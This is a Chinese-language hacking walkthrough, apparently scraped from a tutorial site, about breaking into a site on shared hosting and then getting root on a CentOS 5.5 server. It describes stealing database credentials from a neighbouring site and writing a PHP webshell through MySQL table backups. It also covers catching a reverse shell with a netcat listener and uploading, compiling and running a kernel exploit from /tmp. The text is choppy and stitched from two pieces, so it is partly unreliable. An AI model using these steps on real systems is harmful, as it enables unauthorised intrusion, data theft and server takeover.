可以CD到根目录上级(/var/www/virtual/),再LS一下,全盘网站都出来了,目标站也没瞎起文件夹名,但是没权限跳不进去
试着TAR打包,没权限,试着单独打包目标站目录文件,可以,但是根目录CONN.CONFIG被限制当前目标站可读权限。
尝试CP目标站include目录,竟然可以复制过来,但是不可写复制不过去,找到了数据库配置信息,再另外服务器上。
先把数据库用phpspyshell备份过来:
查看到一些配置信息跟账号,但是没有后台路径等敏感信息
扫描工具扫不到目标网站文件夹,估计修改过了
试着提权CMDSHELL为USER或者ROOT,没有直接去看Apache的配置设置,试着WGET几个EXP,但是都没用,估计打过补丁
CP虽然可以,但是不知道具体的信息
既然WEB没权限,就试着MYSQL看看有没有权限吧
(本文来源于图老师网站,更多请访问http://m.tulaoshi.com/fuwuqi/)直接
CREATE TABLE hackdn (spider BLOB);创建表hackdn
插一句话
保存
然后备份成目标路径1.php文件。发现连接不了。
CP过来一看,被反译符分隔了,
(本文来源于图老师网站,更多请访问http://m.tulaoshi.com/fuwuqi/)不加 ‘ 的话,就插入
再备份为PHP后,本地保存以下代码为
代码如下复制代码 1.HTMLform ENCTYPE=multipart/form-data ACTION=http://www.webshell.cc/mysql_bak/1.php METHOD=POST简单的linux提权
拿到shell了,准备提权.先看下linux内核
uname -a
2.6.18-194.11.3.el5 内核 2010的,这个好CentOS release 5.5好提
然后百度或者其它路径找EXP,2.6.18-194这个内核我已经收藏过.上传到/tmp,为什么要传到这个目录呢?
因为tmp目录可写可执行一般,继续ing.
找个外网IP 监听12666,当然12666也可以改。我这里用NC监听nc -l -n -v -p 12666
然后再点你shell
连接成功就出现下面的内容
然后我们进到/tmp目录
cd /tmp 进入到tmp目录了,看下我们之前上传的2.6.18-194
我这里有权限rwx,可读可写可执行.如果没有权限chmod -R 777 文件名
我这里的exp已编译过了,直接执行溢出就ok了 ./2.6.18-194 要是你的exp没有编译gcc -o /tmp/文件名 /tmp/文件名.c ,自己编译下就行了
成功了。。 其实linux提权还是很简单,关键看有没exp... 完了 完了 !!!!!